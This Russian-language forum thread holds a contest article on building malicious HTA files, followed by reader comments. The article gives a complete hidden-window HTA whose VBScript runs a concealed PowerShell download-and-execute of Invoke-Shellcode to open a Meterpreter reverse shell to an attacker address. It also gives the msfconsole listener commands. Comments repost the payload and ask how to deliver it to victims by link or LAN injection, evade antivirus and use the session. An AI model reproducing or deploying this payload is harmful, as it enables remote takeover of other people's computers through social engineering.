Статья Малварь на HTML или HTA для хакера

Статья для участия в конкурсе на Codeby. КЛИК!

{-- == ВВЕДЕНИЕ == --}

В этой статье будет рассказано о разработке вредоносных приложений на HTML. Но возникает вопрос, а зачем это вообще нужно? Существует очень много ситуаций, когда такая малварь может пригодиться. И чаще всего, эти ситуации прикладные. Например, социально-технический вектор. Расширение .hta не вызывает особых подозрений, а значит может быть использовано в данном случае.

{-- == ОСНОВНАЯ ЧАСТЬ == --}

Кто-то из вас скажет, что HTML не является языком программирования и будет прав, но в Windows существует возможность безбраузерного взаимодействия с документами HTML. Эта технология носит название HTA (HTML Application).
Эти приложения имеют расширения ".hta" и возможность их создания вышла уже в марте 1999 года. Так как HTA поддерживает исполнение сценариев, они могут использоваться для выполнения вредоносного кода.

Прочитать об этой технологии вы можете здесь:

Запуск HTA приложений происходит с помощью прикладной программы mshta.exe, которая использует недокументированную функцию RunHTMLApplication для их запуска. По умолчанию файлам с расширением .hta для запуска присвоена программа mshta.exe, поэтому для запуска HTA файлов достаточно сохранить их с нужным расширением. Давайте рассмотрим, как именно происходит разработка HTML Application приложений.

Для начала, создадим файл с расширением .hta и сохраним его на диске.

1.png


Любопытный факт. Если запустить файл теперь, то особого прока это нам не принесёт, однако файл уже находится в рабочем состоянии.

2.png


В каждой программе, в каждом языке программирования есть определённый скелет, с которым необходимо работать. У HTA он такой:

HTML:
<html>
<head>
  <HTA:APPLICATION ID="oHTA"
    APPLICATIONNAME="Имя приложения"
    BORDER="Вид оформления окна. Варианты: thin/dialog/none/thick."
    BORDERSTYLE="Стиль рамки окна. Варианты: complex, normal, raised, static, sunken"
    CAPTION="Наличие загаловка у окна. Варианты: yes/no"
    maximizeButton="Наличие кнопки «Восстановить». Варианты: yes/no"
    minimizeButton="наличие кнопки «свернуть». Варианты: yes/no"
    ICON="Путь к значку окна в формате ICO (32x32)"
    SHOWINTASKBAR="Отображение документа в панели задач Windows. Варианты: yes/no"
    SINGLEINSTANCE="Можно ли открывать документы с тем же APPLIcATIONNAME? Варианты: yes/no"
    SYSMENU="Наличие системного меню и кнопок управления окном в заголовке окна. Варианты: yes/no"
    VERSION="Версия HTA. Я обычно ставлю 1.0"
    WINDOWSTATE="Исходный размер окна. Варианты: normal, minimize, maximize."/>
</head>

<body>
   Тело документа.
</body>

</html>


Как я уже сказал выше в HTA можно добавлять скрипты, как VBScript или JavaScript. Добавляется он также как и в обычные страницы. Кстати, аргументы с которым было запущено приложение можно получить с помощью атрибута commandLine элемента HTA:APPLICATION. Вот пример небольшого HTA приложения.

HTML:
<html>
  <head>
    <title>HTA Test</title>
      <HTA:APPLICATION
       APPLICATIONNAME="Codeby"
       SCROLL="yes"
       SINGLEINSTANCE="yes"
       WINDOWSTATE="maximize"
      />
  </head>


  <body>
   <script language="VBScript">
       Msgbox "Hello, Codeby.NET!"
   </script>
  </body>
</html>

Сохраним и запустим это и мы получим примерно следующий результат.

3.png


Как вы можете увидеть, скрипт был успешно запущен и отработан. Мы познакомились с основами технологии HTML Application. Теперь, можно перейти к самой теме статьи.

Давайте создадим приложения для получения сессии в Meterpreter. Нам нужно исключить появление окна, поэтому скелет, с которым мы будем работать будет такой:


HTML:
<html>
<head>
  <HTA:APPLICATION ID="oHTA"
    APPLICATIONNAME="MSession"
    BORDER="none"
    SHOWINTASKBAR="no"
    SINGLEINSTANCE="no"
    SYSMENU="no"
    VERSION="1.0"
    WINDOWSTATE="minimize"
   />
</head>
<body>
</body>
</html>

Теперь, добавим запуск вредоносной Powershell команды через VBScript. Сначала, подготовим PowerShell команду.

1. Не будем показывать окно командной строки, отключим использование профиля powershell, отключим использование интерактивного режима и разрешим запуск сторонних скриптов. Этого можно достичь с помощью этих опций.

Код:
-w hidden -nop -noni -exec bypass

2. Подготовим вредоносный payload. Можно использовать эту нагрузку, которая предоставит нам meterpreter shell. Используем PowerSploit скрипт. Для этого скачаем его и запустим с нужными параметрами.


Код:
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force
,
где вместо 192.168.0.106 и 8007 укажите IP и порт атакующего.

3. Соберём команду и она примет следующий вид:

Код:
powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force



Теперь, вставим следующий VBScript в HTA файл.

Код:
Window.ReSizeTo 0,0
'Делаем окно невидимым, уменьшим его размер до минимального
Window.MoveTo -4000, -4000
'Выносим окно за пределы видимости
 
Set wsh = CreateObject("wscript.shell")
'Создаём объект для выполения команд
wsh.Run "powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force"
'Выполняем команду
Window.Close
'Завершаем работу

После данной манипуляции HTA файл приобретает следующий вид:

HTML:
<html>
  <head>
    <HTA:APPLICATION ID="oHTA"
      APPLICATIONNAME="MSession"
      BORDER="none"
      SHOWINTASKBAR="no"
      SINGLEINSTANCE="no"
      SYSMENU="no"
      VERSION="1.0"
      WINDOWSTATE="minimize"
     />
  </head>

  <body>
    <script language="VBScript">
      Window.ReSizeTo 0,0
      Window.MoveTo -4000, -4000
 
      Set wsh = CreateObject("wscript.shell")
      wsh.Run "powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force"
      Window.Close
    </script>
  </body>
</html>

Сохраните этот файл на диске.

Запустим Meterpreter Listener на ПК атакующего:

4.png


Вот последовательность команд для его запуска:
Код:
msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.0.106
set LPORT 8007
run
, где вместо 192.168.0.106 и 8007 указываем IP атакующего и желаемый порт.


Теперь, запустив вредоносный HTA документ мы получим meterpreter сессию:

5.png


{-- == ЗАКЛЮЧЕНИЕ == --}

На скриншоте выше видно, что сессия открылась успешно и мы можем взаимодействовать с заражённым компьютером.

Ну, на этом всё. Спасибо за внимание.
 
Последнее редактирование:
Выполнил все по статье. На сколько я понял, сессию поймал. А что дальше делать? Как по файловой системе перемещаться и тд?)
 

Вложения

  • Снимок экрана от 2018-01-24 18-50-16.png
    Снимок экрана от 2018-01-24 18-50-16.png
    14,8 КБ · Просмотры: 345
Что по поводу детекта АВ?
Стоит ли вообще браться?)
Или криптуется?
 
Приветствую!
Есть несколько вопросов.
1. Этот код можно разместить а apache2 в папку www и скормить ссылку жертве или это только как файл работает?:
<html>
<head>
<HTA:APPLICATION ID="oHTA"
APPLICATIONNAME="MSession"
BORDER="none"
SHOWINTASKBAR="no"
SINGLEINSTANCE="no"
SYSMENU="no"
VERSION="1.0"
WINDOWSTATE="minimize"
/>
</head>

<body>
<script language="VBScript">
Window.ReSizeTo 0,0
Window.MoveTo -4000, -4000

Set wsh = CreateObject("wscript.shell")
wsh.Run "powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString(' link removed Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force"
Window.Close
</script>
</body>
</html>
2.вопрос.В листенере указывать ip:port локальный или внешний и порт пробрасывать в роутере?:
msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.0.106
set LPORT 8007
run
3. вопрос. В строке нужно менять" " или оставить всё как есть? :
wsh.Run "powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString(' link removed Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force"
4.вопрос. Этот скрипт ведь можно ещё и за инжектить через к примеру xerosploit(в локальной сети), или я ошибаюсь?:
<script language="VBScript">
Window.ReSizeTo 0,0
Window.MoveTo -4000, -4000

Set wsh = CreateObject("wscript.shell")
wsh.Run "powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString(' link removed Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force"
Window.Close
</script>
 
Эх где мой 2006, где мои ботнеты под гибридный hta с отправкой статистики в секрьюрный вебчат, r0hack так тоже шутили шарповцы и плюсы, но умолкали когда это сцуко работало :)

Что по поводу детекта АВ?
Стоит ли вообще браться?)
Или криптуется?

Всё палися, всё авер, не стоит вообще даже время тратить :)
 
Последнее редактирование модератором:
Статья для участия в конкурсе на Codeby. КЛИК!

{-- == ВВЕДЕНИЕ == --}

В этой статье будет рассказано о разработке вредоносных приложений на HTML. Но возникает вопрос, а зачем это вообще нужно? Существует очень много ситуаций, когда такая малварь может пригодиться. И чаще всего, эти ситуации прикладные. Например, социально-технический вектор. Расширение .hta не вызывает особых подозрений, а значит может быть использовано в данном случае.

{-- == ОСНОВНАЯ ЧАСТЬ == --}

Кто-то из вас скажет, что HTML не является языком программирования и будет прав, но в Windows существует возможность безбраузерного взаимодействия с документами HTML. Эта технология носит название HTA (HTML Application).
Эти приложения имеют расширения ".hta" и возможность их создания вышла уже в марте 1999 года. Так как HTA поддерживает исполнение сценариев, они могут использоваться для выполнения вредоносного кода.

Прочитать об этой технологии вы можете здесь:

Запуск HTA приложений происходит с помощью прикладной программы mshta.exe, которая использует недокументированную функцию RunHTMLApplication для их запуска. По умолчанию файлам с расширением .hta для запуска присвоена программа mshta.exe, поэтому для запуска HTA файлов достаточно сохранить их с нужным расширением. Давайте рассмотрим, как именно происходит разработка HTML Application приложений.

Для начала, создадим файл с расширением .hta и сохраним его на диске.

Посмотреть вложение 12948

Любопытный факт. Если запустить файл теперь, то особого прока это нам не принесёт, однако файл уже находится в рабочем состоянии.

Посмотреть вложение 12949

В каждой программе, в каждом языке программирования есть определённый скелет, с которым необходимо работать. У HTA он такой:

HTML:
<html>
<head>
  <HTA:APPLICATION ID="oHTA"
    APPLICATIONNAME="Имя приложения"
    BORDER="Вид оформления окна. Варианты: thin/dialog/none/thick."
    BORDERSTYLE="Стиль рамки окна. Варианты: complex, normal, raised, static, sunken"
    CAPTION="Наличие загаловка у окна. Варианты: yes/no"
    maximizeButton="Наличие кнопки «Восстановить». Варианты: yes/no"
    minimizeButton="наличие кнопки «свернуть». Варианты: yes/no"
    ICON="Путь к значку окна в формате ICO (32x32)"
    SHOWINTASKBAR="Отображение документа в панели задач Windows. Варианты: yes/no"
    SINGLEINSTANCE="Можно ли открывать документы с тем же APPLIcATIONNAME? Варианты: yes/no"
    SYSMENU="Наличие системного меню и кнопок управления окном в заголовке окна. Варианты: yes/no"
    VERSION="Версия HTA. Я обычно ставлю 1.0"
    WINDOWSTATE="Исходный размер окна. Варианты: normal, minimize, maximize."/>
</head>

<body>
   Тело документа.
</body>

</html>


Как я уже сказал выше в HTA можно добавлять скрипты, как VBScript или JavaScript. Добавляется он также как и в обычные страницы. Кстати, аргументы с которым было запущено приложение можно получить с помощью атрибута commandLine элемента HTA:APPLICATION. Вот пример небольшого HTA приложения.

HTML:
<html>
  <head>
    <title>HTA Test</title>
      <HTA:APPLICATION
       APPLICATIONNAME="Codeby"
       SCROLL="yes"
       SINGLEINSTANCE="yes"
       WINDOWSTATE="maximize"
      />
  </head>


  <body>
   <script language="VBScript">
       Msgbox "Hello, Codeby.NET!"
   </script>
  </body>
</html>

Сохраним и запустим это и мы получим примерно следующий результат.

Посмотреть вложение 12950

Как вы можете увидеть, скрипт был успешно запущен и отработан. Мы познакомились с основами технологии HTML Application. Теперь, можно перейти к самой теме статьи.

Давайте создадим приложения для получения сессии в Meterpreter. Нам нужно исключить появление окна, поэтому скелет, с которым мы будем работать будет такой:


HTML:
<html>
<head>
  <HTA:APPLICATION ID="oHTA"
    APPLICATIONNAME="MSession"
    BORDER="none"
    SHOWINTASKBAR="no"
    SINGLEINSTANCE="no"
    SYSMENU="no"
    VERSION="1.0"
    WINDOWSTATE="minimize"
   />
</head>
<body>
</body>
</html>

Теперь, добавим запуск вредоносной Powershell команды через VBScript. Сначала, подготовим PowerShell команду.

1. Не будем показывать окно командной строки, отключим использование профиля powershell, отключим использование интерактивного режима и разрешим запуск сторонних скриптов. Этого можно достичь с помощью этих опций.

Код:
-w hidden -nop -noni -exec bypass

2. Подготовим вредоносный payload. Можно использовать эту нагрузку, которая предоставит нам meterpreter shell. Используем PowerSploit скрипт. Для этого скачаем его и запустим с нужными параметрами.

Код:
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force
,
где вместо 192.168.0.106 и 8007 укажите IP и порт атакующего.

3. Соберём команду и она примет следующий вид:
Код:
powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force



Теперь, вставим следующий VBScript в HTA файл.

Код:
Window.ReSizeTo 0,0
'Делаем окно невидимым, уменьшим его размер до минимального
Window.MoveTo -4000, -4000
'Выносим окно за пределы видимости

Set wsh = CreateObject("wscript.shell")
'Создаём объект для выполения команд
wsh.Run "powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force"
'Выполняем команду
Window.Close
'Завершаем работу

После данной манипуляции HTA файл приобретает следующий вид:

HTML:
<html>
  <head>
    <HTA:APPLICATION ID="oHTA"
      APPLICATIONNAME="MSession"
      BORDER="none"
      SHOWINTASKBAR="no"
      SINGLEINSTANCE="no"
      SYSMENU="no"
      VERSION="1.0"
      WINDOWSTATE="minimize"
     />
  </head>

  <body>
    <script language="VBScript">
      Window.ReSizeTo 0,0
      Window.MoveTo -4000, -4000

      Set wsh = CreateObject("wscript.shell")
      wsh.Run "powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force"
      Window.Close
    </script>
  </body>
</html>

Сохраните этот файл на диске.

Запустим Meterpreter Listener на ПК атакующего:

Посмотреть вложение 12951

Вот последовательность команд для его запуска:
Код:
msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.0.106
set LPORT 8007
run
, где вместо 192.168.0.106 и 8007 указываем IP атакующего и желаемый порт.


Теперь, запустив вредоносный HTA документ мы получим meterpreter сессию:

Посмотреть вложение 12952

{-- == ЗАКЛЮЧЕНИЕ == --}

На скриншоте выше видно, что сессия открылась успешно и мы можем взаимодействовать с заражённым компьютером.

Ну, на этом всё. Спасибо за внимание.
Как вместо этого:
Код:
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force
добавить свой код полезной нагрузки(именно в виде кода, а не ссылки)?
 
Статья для участия в конкурсе на Codeby. КЛИК!

{-- == ВВЕДЕНИЕ == --}

В этой статье будет рассказано о разработке вредоносных приложений на HTML. Но возникает вопрос, а зачем это вообще нужно? Существует очень много ситуаций, когда такая малварь может пригодиться. И чаще всего, эти ситуации прикладные. Например, социально-технический вектор. Расширение .hta не вызывает особых подозрений, а значит может быть использовано в данном случае.

{-- == ОСНОВНАЯ ЧАСТЬ == --}

Кто-то из вас скажет, что HTML не является языком программирования и будет прав, но в Windows существует возможность безбраузерного взаимодействия с документами HTML. Эта технология носит название HTA (HTML Application).
Эти приложения имеют расширения ".hta" и возможность их создания вышла уже в марте 1999 года. Так как HTA поддерживает исполнение сценариев, они могут использоваться для выполнения вредоносного кода.

Прочитать об этой технологии вы можете здесь:

Запуск HTA приложений происходит с помощью прикладной программы mshta.exe, которая использует недокументированную функцию RunHTMLApplication для их запуска. По умолчанию файлам с расширением .hta для запуска присвоена программа mshta.exe, поэтому для запуска HTA файлов достаточно сохранить их с нужным расширением. Давайте рассмотрим, как именно происходит разработка HTML Application приложений.

Для начала, создадим файл с расширением .hta и сохраним его на диске.

Посмотреть вложение 12948

Любопытный факт. Если запустить файл теперь, то особого прока это нам не принесёт, однако файл уже находится в рабочем состоянии.

Посмотреть вложение 12949

В каждой программе, в каждом языке программирования есть определённый скелет, с которым необходимо работать. У HTA он такой:

HTML:
<html>
<head>
  <HTA:APPLICATION ID="oHTA"
    APPLICATIONNAME="Имя приложения"
    BORDER="Вид оформления окна. Варианты: thin/dialog/none/thick."
    BORDERSTYLE="Стиль рамки окна. Варианты: complex, normal, raised, static, sunken"
    CAPTION="Наличие загаловка у окна. Варианты: yes/no"
    maximizeButton="Наличие кнопки «Восстановить». Варианты: yes/no"
    minimizeButton="наличие кнопки «свернуть». Варианты: yes/no"
    ICON="Путь к значку окна в формате ICO (32x32)"
    SHOWINTASKBAR="Отображение документа в панели задач Windows. Варианты: yes/no"
    SINGLEINSTANCE="Можно ли открывать документы с тем же APPLIcATIONNAME? Варианты: yes/no"
    SYSMENU="Наличие системного меню и кнопок управления окном в заголовке окна. Варианты: yes/no"
    VERSION="Версия HTA. Я обычно ставлю 1.0"
    WINDOWSTATE="Исходный размер окна. Варианты: normal, minimize, maximize."/>
</head>

<body>
   Тело документа.
</body>

</html>


Как я уже сказал выше в HTA можно добавлять скрипты, как VBScript или JavaScript. Добавляется он также как и в обычные страницы. Кстати, аргументы с которым было запущено приложение можно получить с помощью атрибута commandLine элемента HTA:APPLICATION. Вот пример небольшого HTA приложения.

HTML:
<html>
  <head>
    <title>HTA Test</title>
      <HTA:APPLICATION
       APPLICATIONNAME="Codeby"
       SCROLL="yes"
       SINGLEINSTANCE="yes"
       WINDOWSTATE="maximize"
      />
  </head>


  <body>
   <script language="VBScript">
       Msgbox "Hello, Codeby.NET!"
   </script>
  </body>
</html>

Сохраним и запустим это и мы получим примерно следующий результат.

Посмотреть вложение 12950

Как вы можете увидеть, скрипт был успешно запущен и отработан. Мы познакомились с основами технологии HTML Application. Теперь, можно перейти к самой теме статьи.

Давайте создадим приложения для получения сессии в Meterpreter. Нам нужно исключить появление окна, поэтому скелет, с которым мы будем работать будет такой:


HTML:
<html>
<head>
  <HTA:APPLICATION ID="oHTA"
    APPLICATIONNAME="MSession"
    BORDER="none"
    SHOWINTASKBAR="no"
    SINGLEINSTANCE="no"
    SYSMENU="no"
    VERSION="1.0"
    WINDOWSTATE="minimize"
   />
</head>
<body>
</body>
</html>

Теперь, добавим запуск вредоносной Powershell команды через VBScript. Сначала, подготовим PowerShell команду.

1. Не будем показывать окно командной строки, отключим использование профиля powershell, отключим использование интерактивного режима и разрешим запуск сторонних скриптов. Этого можно достичь с помощью этих опций.

Код:
-w hidden -nop -noni -exec bypass

2. Подготовим вредоносный payload. Можно использовать эту нагрузку, которая предоставит нам meterpreter shell. Используем PowerSploit скрипт. Для этого скачаем его и запустим с нужными параметрами.

Код:
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force
,
где вместо 192.168.0.106 и 8007 укажите IP и порт атакующего.

3. Соберём команду и она примет следующий вид:
Код:
powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force



Теперь, вставим следующий VBScript в HTA файл.

Код:
Window.ReSizeTo 0,0
'Делаем окно невидимым, уменьшим его размер до минимального
Window.MoveTo -4000, -4000
'Выносим окно за пределы видимости

Set wsh = CreateObject("wscript.shell")
'Создаём объект для выполения команд
wsh.Run "powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force"
'Выполняем команду
Window.Close
'Завершаем работу

После данной манипуляции HTA файл приобретает следующий вид:

HTML:
<html>
  <head>
    <HTA:APPLICATION ID="oHTA"
      APPLICATIONNAME="MSession"
      BORDER="none"
      SHOWINTASKBAR="no"
      SINGLEINSTANCE="no"
      SYSMENU="no"
      VERSION="1.0"
      WINDOWSTATE="minimize"
     />
  </head>

  <body>
    <script language="VBScript">
      Window.ReSizeTo 0,0
      Window.MoveTo -4000, -4000

      Set wsh = CreateObject("wscript.shell")
      wsh.Run "powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force"
      Window.Close
    </script>
  </body>
</html>

Сохраните этот файл на диске.

Запустим Meterpreter Listener на ПК атакующего:

Посмотреть вложение 12951

Вот последовательность команд для его запуска:
Код:
msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.0.106
set LPORT 8007
run
, где вместо 192.168.0.106 и 8007 указываем IP атакующего и желаемый порт.


Теперь, запустив вредоносный HTA документ мы получим meterpreter сессию:

Посмотреть вложение 12952

{-- == ЗАКЛЮЧЕНИЕ == --}

На скриншоте выше видно, что сессия открылась успешно и мы можем взаимодействовать с заражённым компьютером.

Ну, на этом всё. Спасибо за внимание.
Как сделать такую же ссылку:
 
Приветствую!
Есть несколько вопросов.
1. Этот код можно разместить а apache2 в папку www и скормить ссылку жертве или это только как файл работает?:
<html>
<head>
<HTA:APPLICATION ID="oHTA"
APPLICATIONNAME="MSession"
BORDER="none"
SHOWINTASKBAR="no"
SINGLEINSTANCE="no"
SYSMENU="no"
VERSION="1.0"
WINDOWSTATE="minimize"
/>
</head>

<body>
<script language="VBScript">
Window.ReSizeTo 0,0
Window.MoveTo -4000, -4000

Set wsh = CreateObject("wscript.shell")
wsh.Run "powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString(' link removed Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force"
Window.Close
</script>
</body>
</html>
2.вопрос.В листенере указывать ip:port локальный или внешний и порт пробрасывать в роутере?:
msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.0.106
set LPORT 8007
run
3. вопрос. В строке нужно менять" " или оставить всё как есть? :
wsh.Run "powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString(' link removed Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force"
4.вопрос. Этот скрипт ведь можно ещё и за инжектить через к примеру xerosploit(в локальной сети), или я ошибаюсь?:
<script language="VBScript">
Window.ReSizeTo 0,0
Window.MoveTo -4000, -4000

Set wsh = CreateObject("wscript.shell")
wsh.Run "powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString(' link removed Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force"
Window.Close
</script>
Можно, конечно, но смысла мало будет. ActiveX есть только в IE, и то, он урезанный, так что работать не будет.
[automerge]1522985510[/automerge]
Как сделать такую же ссылку:
Не понял тебя.
 
Можно, конечно, но смысла мало будет. ActiveX есть только в IE, и то, он урезанный, так что работать не будет.
[automerge]1522985510[/automerge]

Не понял тебя.
ну когда переходишь по этой ссылке каспер ругается на шелл код, как сделать также но с моим кодом?
 
Для запуска Active X (Да фреймворк только для IE как таковой) в хроме есть IETab расширение. В Лисе тоже какое то было. Ну и стоит не забывать о NPAPI
 
Ребят, хелпа нужна. Когда открывается хост все как надо сессия я больше ничего в терминале делать не могу. То есть как бы могу писать но ничего это не даст по скольку нету строки meterpreter >. кто знает что делать?
 
Ребят, хелпа нужна. Когда открывается хост все как надо сессия я больше ничего в терминале делать не могу. То есть как бы могу писать но ничего это не даст по скольку нету строки meterpreter >. кто знает что делать?
перекомпилировать, сожрал наверное ав.
 
  • Нравится
Реакции: swagcat228
Подскажите где эту программу скачать Meterpreter Listener .. пжл или как я поняла это Linux?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!